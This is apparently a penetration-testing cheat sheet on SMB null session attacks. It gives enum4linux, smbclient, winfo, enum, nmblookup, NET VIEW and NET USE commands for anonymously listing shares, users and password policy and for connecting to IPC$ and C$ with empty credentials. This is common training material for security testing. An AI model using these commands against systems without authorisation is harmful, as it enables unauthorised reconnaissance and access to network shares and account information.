🎯Null Session Attacks

Null Session Attack Tools

[1] enum4linux
[2] smbclient
[3] winfo
[4] enum
[5] NET USE

Enumeration using enum4linux

enum4linux -a <IP-Address>

enum4linux -n <IP-Address>

Notations

-a ==> Do all simple enumeration
-n ==> Do an nmblookup (similar to nbtstat)

Enumeration and Exploitation Using smbclient

Share Enumeration can be performed using tools provided by Samba Suitesmbclient is an FTP like client to access Windows shares; this tool can, among other things, enumerate the shares provided by a host

Command Example

smbclient -L //10.130.40.80 -N

Checking for Null Sessions with Linux

We can also perform the very same checks by using smbclient:

smbclient //10.130.40.80/IPC$ -N

smbclient //10.130.40.80/C$ -N

smbclient \\\\\\\\192.168.99.162\\\\WorkSharing -N

useful smbclient commands

smbclient -L WORKGROUP -I 192.168.99.162 -N -U ""

Exploiting Null Sessions with winfo

Winfo is another command line utility we can use to automate null session exploitation. To use it, you just need to specify the target IP address and use the -n command line switch to tell the tool to use null sessions.

winfo is available in packetstorm

Basic Command Syntax

winfo <ip-address> -n

Notation

-n ==> Null Sessions

Exploiting Null Sessions with enum

** Please Note ** It will note administrative shares too.enum is available in packetstorm

enum -S <ip-address>

enum -U <ip-address>

enum -P <ip-address>

Notations

-S ==> Enumerate the Shares of a Machine
-U ==> Enumerate the Users of a Machine
-P ==> Let us see the Password Policy if wwe want to mount the network [Authentication Attacks]

Enumerate Using nmblookup

To perform the same operations of nbstat, we can use nmblookup with the same command line switch:

Command Syntax

nmblookup -A <target-IP-Address>

Enumerate using NET VIEW

Once an attacker knows that a machine has File Server service running, they can enumerate the shares by using the NET VIEW command

Command Syntax

NET VIEW <target-IP>

Checking Null Sessions with Windows

To connect, we have to type the following command in a Windows shell:

NET USE \\\\<target-IP-address>\\IPC$ '' /u:''

This tells Windows to connect to the IPC$ share by using an empty password and an empty username!